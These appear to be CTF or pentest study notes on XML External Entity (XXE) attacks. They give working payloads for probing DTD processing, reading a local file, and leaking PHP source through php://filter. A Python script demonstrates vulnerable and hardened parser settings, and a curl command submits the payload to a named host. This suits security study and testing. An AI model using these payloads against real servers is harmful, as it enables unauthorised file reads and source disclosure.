XXE

XML External Entity

XXE can be used to read local files on the host, to make the server issue requests to internal hosts (SSRF), and to get RCE in very specific circumstances. The lever is the DTD: by declaring our own entities inside a DOCTYPE we control what the parser substitutes wherever the document references them.

Determine whether the parser honours our DTD at all (an internal entity, no file access needed):

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe "haha, this is xxe!">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

Reading a local file (LFI) with an external entity:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///tmp/messages_outbound.txt">]>
<letter>
        <from>0x90skids</from>
        <return_addr>return_addr</return_addr>
        <name>&xxe;</name>
        <addr>addr</addr>
        <message>message</message>
</letter>

Pulling a .php file this way usually fails: the parser has to treat the included file as XML, and a file containing <?php ... ?> or unbalanced angle brackets makes the document malformed, so the request errors out instead of returning the source. On a PHP target we can have the php://filter stream wrapper Base64-encode the file before it is inlined, which turns it into plain text the parser accepts; decode the response to recover the source.

<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
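To see locally why the probe and the file read behave differently, here is an added Python example (not from the original notes) that builds the same <letter> payload and feeds it to Python's xml.sax parser twice: with external general entity resolution turned on (the vulnerable configuration) and off (the default since Python 3.7.1). The target is a constructed temp file standing in for /tmp/messages_outbound.txt; the php://filter payload is only built, since there is no PHP target to fetch from.

```python
"""Local reproduction of the XXE probe and file-read payloads."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Payload shape taken from the <letter> documents above; the entity
# definition is filled in per request.
PAYLOAD_TEMPLATE = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe {definition}>]>
<letter>
    <from>0x90skids</from>
    <name>&xxe;</name>
</letter>
"""


def probe_payload(marker="haha, this is xxe!"):
    """Internal entity: expands whenever the DTD is processed at all."""
    return PAYLOAD_TEMPLATE.format(definition=f'"{marker}"')


def file_payload(url):
    """External entity: only expands if the parser fetches SYSTEM URLs
    (file://, php://filter/..., http://internal-host/...)."""
    return PAYLOAD_TEMPLATE.format(definition=f'SYSTEM "{url}"')


class NameCollector(ContentHandler):
    """Collects the text that ends up inside <name>, where &xxe; sits."""

    def __init__(self):
        super().__init__()
        self._in_name = False
        self.parts = []

    def startElement(self, tag, attrs):
        if tag == "name":
            self._in_name = True

    def endElement(self, tag):
        if tag == "name":
            self._in_name = False

    def characters(self, content):
        if self._in_name:
            self.parts.append(content)


def parse_letter(xml_text, resolve_external):
    """Parse with xml.sax; resolve_external=True is the vulnerable setting,
    False is the hardened one (and the stdlib default since 3.7.1)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = NameCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("latin-1")))
    return "".join(handler.parts)


def demo():
    """Run the probe and the file read against both parser configurations."""
    # Constructed stand-in for /tmp/messages_outbound.txt (assumed content).
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("CTF{constructed-secret}")
        path = f.name
    try:
        url = "file://" + path
        return {
            "probe_vulnerable": parse_letter(probe_payload(), True),
            "probe_hardened": parse_letter(probe_payload(), False),
            "file_vulnerable": parse_letter(file_payload(url), True),
            "file_hardened": parse_letter(file_payload(url), False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:16s} -> {value!r}")
```

The probe expands in both configurations, so a positive probe only proves the server processes our DTD; the SYSTEM entity is what separates a parser that will fetch files and URLs from one that silently drops the reference, which is exactly the check to make before spending time on php://filter or internal-host payloads.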

We can submit the XML file to the endpoint with curl's @ syntax for reading the request body from a file, and route the request through an interception proxy so the response can be inspected there. Note that -d strips newlines from the file and sends the default form Content-Type; if the endpoint is picky, use --data-binary and set an explicit Content-Type header for XML.

curl --proxy 127.0.0.1:8082 -k -d@./test.xml http://m4lwhere.org/post.php
